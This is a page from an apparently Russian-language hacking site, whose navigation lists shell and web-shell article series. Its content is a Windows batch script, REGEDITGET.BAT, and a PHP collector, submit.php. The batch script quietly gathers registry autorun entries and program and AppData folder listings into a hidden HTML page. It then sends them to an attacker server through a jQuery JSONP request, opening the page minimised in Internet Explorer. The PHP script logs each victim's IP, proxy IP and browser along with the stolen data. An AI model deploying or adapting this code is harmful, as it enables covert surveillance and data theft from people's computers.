• Поиск
  • Кодер HEX
  • Чекер proxy
  • CSRF/XSS форма

ЦИКЛЫ СТАТЕЙ:

  • 4. SHELL
  • 4.1. ANDROID SHELL
  • 4.2. WINDOWS. КОМАНДНАЯ СТРОКА
  • 4.3. LINUX. UNIX SHELL
  • 4.4. SHELL НЕ БЕЗ METASPLOIT
  • 4.5. WEB SHELL

REGEDITGET.BAT

REGEDITGET.BAT:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
::regeditget.bat: create and send a log file of registry and folders
::usage: in variable "second" edit url, in command "start" edit address for browser
::warning: run as administrator or create sfx with request rights administrator

@echo off
setlocal EnableDelayedExpansion

set path=%temp%\reg.html
set "first=<html><head><style>#content{display:none;}</style><script src=https://code.jquery.com/jquery-1.10.2.js></script></head><body><div id=content>"
set "second=</div><script>content=document.getElementById('content').innerHTML;$.ajax({ type: 'GET', dataType: 'jsonp', data: content, url: 'http://sitename/submit.php' });</script></body></html>"

echo !first! >%path%

echo AUTORUN >>%path%
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >>%path%
REG QUERY HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run >>%path%

echo PROGRAM FILES >>%path%
cd c:\program files & dir /b >>%path%

echo PROGRAM FILES (X86) >>%path%
cd c:\program files (x86) & dir /b >>%path%

echo APPDATA >>%path%
cd %appdata% & dir /b >>%path%

echo !second! >>%path%

start /min "" "C:\Program Files\Internet Explorer\iexplore.exe" %path%

submit.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

$date=date('d.m.Y H:i:s');
$ip=getenv('REMOTE_ADDR');
$query=$_SERVER["QUERY_STRING"];
$real_ip=getenv('HTTP_X_FORWARDED_FOR');
$otkuda=getenv('HTTP_REFERER');
$browser=getenv('HTTP_USER_AGENT');
$win=getenv('windir');
$style = '<style>body{font-family:monospace;font-size:14px;color:#444;width:100%;margin:0;padding:15px;box-sizing:border-box;word-wrap:break-word;}b{color:#000;}font:nth-child(3n+3){color:red!important;}</style>';
$log = $style."<br><div><b>[".$date."]</b> <b>IP:</b> ".$ip."<b> REAL IP(if used proxy): ".$real_ip."</b><br/>[<a href=".$otkuda.">".$otkuda."</a>]<br/>".$browser."</div>\n\n";
$datename=date('[d.m.Y_H.i.s]');
$filename = $datename."_[".$ip."].html";
$file = fopen("$filename", a);
fwrite($file, $log);
foreach ($_REQUEST as $key => $val)
{
    $replace0 = str_replace('callback','',$key);
    $replace1 = str_replace('AUTORUN_','<br><br><b>AUTORUN:</b>',$replace0);
    $replace2 = str_replace('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run','<br><br><b>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</b><font></font><font>',$replace1);
    $replace3 = str_replace('HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run','</font><br><br><b>HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</b><font></font><font></font><font>',$replace2);
    $replace4 = str_replace('____','</font><br><font>',$replace3);
    $replace5 = str_replace('PROGRAM_FILES_','</font><br><br><b>PROGRAM_FILES:</b><br>',$replace4);
    $replace6 = str_replace('PROGRAM_FILES(X86)_','<br><br><b>PROGRAM_FILES(X86):</b><br>',$replace5);
    $replace7 = str_replace('APPDATA','<br><br><b>APPDATA:</b><br>',$replace6);
    fwrite($file,$replace7);
}
fwrite($file,' ');
?>

Теги:

Автор: